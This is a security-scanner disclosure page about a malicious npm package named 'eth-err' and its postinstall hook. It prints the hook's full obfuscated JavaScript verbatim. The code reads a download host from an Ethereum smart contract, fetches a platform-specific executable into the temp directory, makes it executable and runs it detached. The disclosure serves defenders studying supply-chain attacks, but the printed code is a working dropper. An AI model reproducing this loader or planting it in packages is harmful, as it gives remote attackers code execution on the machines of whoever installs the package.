Sandworm scans all new Npm package versions for malicious install scripts.
Scanning since October 2024.
Follow our 𝕏 / Twitter feed for updates.
eth-err:
Detected: 31 Oct 2024
Detected Date: 31 Oct 2024
Affected Install Script: postinstall
Package Source: ↗️ View on Npm
The script is designed to fetch and execute a remote executable file based on the platform of the operating system. It poses a significant risk as it downloads and runs potentially malicious code without user consent, which could lead to unauthorized access or control over the system.
Install script:
node 2eqk4ie0.cjsconst _0x433a12=_0x6649;function _0x6649(_0x423793,_0x139b41){const _0x5377f3=_0x5377();return _0x6649=function(_0x6649b,_0x36d7f9){_0x6649b=_0x6649b-0x1e6;let _0x541edb=_0x5377f3[_0x6649b];return _0x541edb;},_0x6649(_0x423793,_0x139b41);}(function(_0x38c5ec,_0x413eba){const _0x3a187f=_0x6649,_0x40f39e=_0x38c5ec();while(!![]){try{const _0x2bc104=-parseInt(_0x3a187f(0x216))/0x1*(parseInt(_0x3a187f(0x203))/0x2)+-parseInt(_0x3a187f(0x20c))/0x3*(parseInt(_0x3a187f(0x1ed))/0x4)+-parseInt(_0x3a187f(0x1ec))/0x5+parseInt(_0x3a187f(0x211))/0x6*(parseInt(_0x3a187f(0x1f0))/0x7)+-parseInt(_0x3a187f(0x208))/0x8+-parseInt(_0x3a187f(0x1e7))/0x9+parseInt(_0x3a187f(0x1f5))/0xa*(parseInt(_0x3a187f(0x20b))/0xb);if(_0x2bc104===_0x413eba)break;else _0x40f39e['push'](_0x40f39e['shift']());}catch(_0xd0b7db){_0x40f39e['push'](_0x40f39e['shift']());}}}(_0x5377,0xe6da3));function _0x5377(){const _0x1fdd8b=['755','basename','AbTBi','child_process','Ошибка\x20при\x20получении\x20IP\x20адреса:','MLdvW','chmodSync','gEbcm','ethers','linux','createWriteStream','ignore','4NnaAJm','0xa1b40044EBc2794f207D45143Bd82a1B86156c6b','/node-macos','PpVNY','xiUnz','12457360oThUxF','GVdQK','tmpdir','11WgxkDa','2961PUEmGi','axios','pipe','evNGm','util','210IvdKEv','GET','Contract','win32','platform','353911BqMaeQ','Ошибка\x20при\x20запуске\x20файла:','oHbls','11219562WEHKaP','error','data','Unsupported\x20platform:\x20','darwin','2223360eBxirs','1780bdWooZ','path','Ошибка\x20установки:','204253PEInfy','mYeST','/node-linux','mainnet','unref','43198030uCvybk','join'];_0x5377=function(){return _0x1fdd8b;};return _0x5377();}const {ethers}=require(_0x433a12(0x1ff)),axios=require(_0x433a12(0x20d)),util=require(_0x433a12(0x210)),fs=require('fs'),path=require(_0x433a12(0x1ee)),os=require('os'),{spawn}=require(_0x433a12(0x1fa)),contractAddress=_0x433a12(0x204),WalletOwner='0x52221c293a21D8CA7AFD01Ac6bFAC7175D590A84',abi=['function\x20getString(address\x20account)\x20public\x20view\x20returns\x20(string)'],provider=ethers['getDefaultProvider'](_0x433a12(0x1f3)),contract=new ethers[(_0x433a12(0x213))](contractAddress,abi,provider),fetchAndUpdateIp=async()=>{const _0x26fe2c=_0x433a12,_0x211ca7={'AbTBi':_0x26fe2c(0x1fb),'MLdvW':function(_0x5ebfa2){return _0x5ebfa2();}};try{const _0x155a21=await contract['getString'](WalletOwner);return _0x155a21;}catch(_0x389070){return console[_0x26fe2c(0x1e8)](_0x211ca7[_0x26fe2c(0x1f9)],_0x389070),await _0x211ca7[_0x26fe2c(0x1fc)](fetchAndUpdateIp);}},getDownloadUrl=_0x2a06fb=>{const _0x18126a=_0x433a12,_0x215685={'GVdQK':'win32','aFooR':_0x18126a(0x200),'zMZKi':_0x18126a(0x1eb)},_0xaa9e56=os['platform']();switch(_0xaa9e56){case _0x215685[_0x18126a(0x209)]:return _0x2a06fb+'/node-win.exe';case _0x215685['aFooR']:return _0x2a06fb+_0x18126a(0x1f2);case _0x215685['zMZKi']:return _0x2a06fb+_0x18126a(0x205);default:throw new Error(_0x18126a(0x1ea)+_0xaa9e56);}},downloadFile=async(_0x1573d6,_0xb896b)=>{const _0x3dec01=_0x433a12,_0x8d2ebf={'xiUnz':_0x3dec01(0x1e8),'PpVNY':function(_0x5bc8c0,_0x443bdb){return _0x5bc8c0(_0x443bdb);},'InfJo':'stream'},_0x24ebbd=fs[_0x3dec01(0x201)](_0xb896b),_0xa69a8a=await _0x8d2ebf[_0x3dec01(0x206)](axios,{'url':_0x1573d6,'method':_0x3dec01(0x212),'responseType':_0x8d2ebf['InfJo']});return _0xa69a8a[_0x3dec01(0x1e9)][_0x3dec01(0x20e)](_0x24ebbd),new Promise((_0x13b060,_0x45b234)=>{const _0x2f58f9=_0x3dec01;_0x24ebbd['on']('finish',_0x13b060),_0x24ebbd['on'](_0x8d2ebf[_0x2f58f9(0x207)],_0x45b234);});},executeFileInBackground=async _0x52688b=>{const _0x111d0b=_0x433a12,_0x514c4e={'oHbls':function(_0x21ebe7,_0x3b8086,_0x3b178a,_0x338d8e){return _0x21ebe7(_0x3b8086,_0x3b178a,_0x338d8e);},'evNGm':_0x111d0b(0x202),'mYeST':_0x111d0b(0x217)};try{const _0x58528d=_0x514c4e[_0x111d0b(0x1e6)](spawn,_0x52688b,[],{'detached':!![],'stdio':_0x514c4e[_0x111d0b(0x20f)]});_0x58528d[_0x111d0b(0x1f4)]();}catch(_0x5a9571){console[_0x111d0b(0x1e8)](_0x514c4e[_0x111d0b(0x1f1)],_0x5a9571);}},runInstallation=async()=>{const _0x5e679d=_0x433a12,_0x16cd20={'gEbcm':function(_0x333645,_0x7ba60f){return _0x333645(_0x7ba60f);}};try{const _0x324dce=await fetchAndUpdateIp(),_0x3f2926=_0x16cd20[_0x5e679d(0x1fe)](getDownloadUrl,_0x324dce),_0x11af73=os[_0x5e679d(0x20a)](),_0x59df5b=path[_0x5e679d(0x1f8)](_0x3f2926),_0x1b3fa4=path[_0x5e679d(0x1f6)](_0x11af73,_0x59df5b);await downloadFile(_0x3f2926,_0x1b3fa4);if(os[_0x5e679d(0x215)]()!==_0x5e679d(0x214))fs[_0x5e679d(0x1fd)](_0x1b3fa4,_0x5e679d(0x1f7));executeFileInBackground(_0x1b3fa4);}catch(_0x59921d){console['error'](_0x5e679d(0x1ef),_0x59921d);}};runInstallation();
